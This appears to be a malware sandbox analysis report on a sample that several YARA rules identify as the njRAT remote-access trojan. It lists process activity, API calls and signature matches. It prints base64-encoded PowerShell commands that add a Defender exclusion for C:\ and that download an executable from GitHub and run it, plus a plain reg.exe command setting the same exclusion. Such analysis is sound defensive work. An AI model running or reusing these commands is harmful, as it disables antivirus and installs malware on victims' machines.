Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=	Jump to behavior

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Code function: 15_2_00A7AF02 NtQuerySystemInformation,	15_2_00A7AF02
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Code function: 15_2_00A7AED1 NtQuerySystemInformation,	15_2_00A7AED1
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_006BBC72 NtSetInformationProcess,	20_2_006BBC72
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_006BAF02 NtQuerySystemInformation,	20_2_006BAF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_006BAED1 NtQuerySystemInformation,	20_2_006BAED1
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_006BBC50 NtSetInformationProcess,	20_2_006BBC50
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 24_2_00A5AF02 NtQuerySystemInformation,	24_2_00A5AF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 24_2_00A5AED1 NtQuerySystemInformation,	24_2_00A5AED1
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 25_2_00D3AF02 NtQuerySystemInformation,	25_2_00D3AF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 25_2_00D3AED1 NtQuerySystemInformation,	25_2_00D3AED1
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 26_2_0095AF02 NtQuerySystemInformation,	26_2_0095AF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 26_2_0095AED1 NtQuerySystemInformation,	26_2_0095AED1

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Code function: 15_2_00E60EC0	15_2_00E60EC0
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Code function: 15_2_00E615B3	15_2_00E615B3
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Code function: 15_2_00E61600	15_2_00E61600
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Code function: 15_2_00E60E90	15_2_00E60E90
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_00C4C1B8	16_2_00C4C1B8
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_064E8EE8	16_2_064E8EE8
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_078F09E0	16_2_078F09E0
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_0797CB40	16_2_0797CB40
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_07977808	16_2_07977808
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_079777F9	16_2_079777F9
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_07976738	16_2_07976738
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_0797C4A2	16_2_0797C4A2
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_07979AAF	16_2_07979AAF
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_0797DA47	16_2_0797DA47
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_079BBCC0	16_2_079BBCC0
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_079B3BE0	16_2_079B3BE0
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_079B5ADF	16_2_079B5ADF
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_079B5AF0	16_2_079B5AF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FF8876A54FA	17_2_00007FF8876A54FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FF8877730E9	17_2_00007FF8877730E9
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_00B7CEB7	20_2_00B7CEB7
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_00B70EC0	20_2_00B70EC0
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_00B73C40	20_2_00B73C40
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_00B70EA4	20_2_00B70EA4
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_00B71600	20_2_00B71600
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_00B715B3	20_2_00B715B3

Sample file is different than original file name gathered from version info

Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamejoinerStub.exe6 vs virus.exe.bin.exe
Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewebhooker2.exe6 vs virus.exe.bin.exe
Source: virus.exe.bin.exe, 00000000.00000002.1503477314.000000001F18A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs virus.exe.bin.exe
Source: virus.exe.bin.exe, 00000000.00000000.1431169171.0000000000E32000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamejoinerStub.exe6 vs virus.exe.bin.exe

Uses reg.exe to modify the Windows registry

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\

Yara signature match

Source: virus.exe.bin.exe, type: SAMPLE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: virus.exe.bin.exe, type: SAMPLE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: virus.exe.bin.exe, type: SAMPLE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: virus.exe.bin.exe, type: SAMPLE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
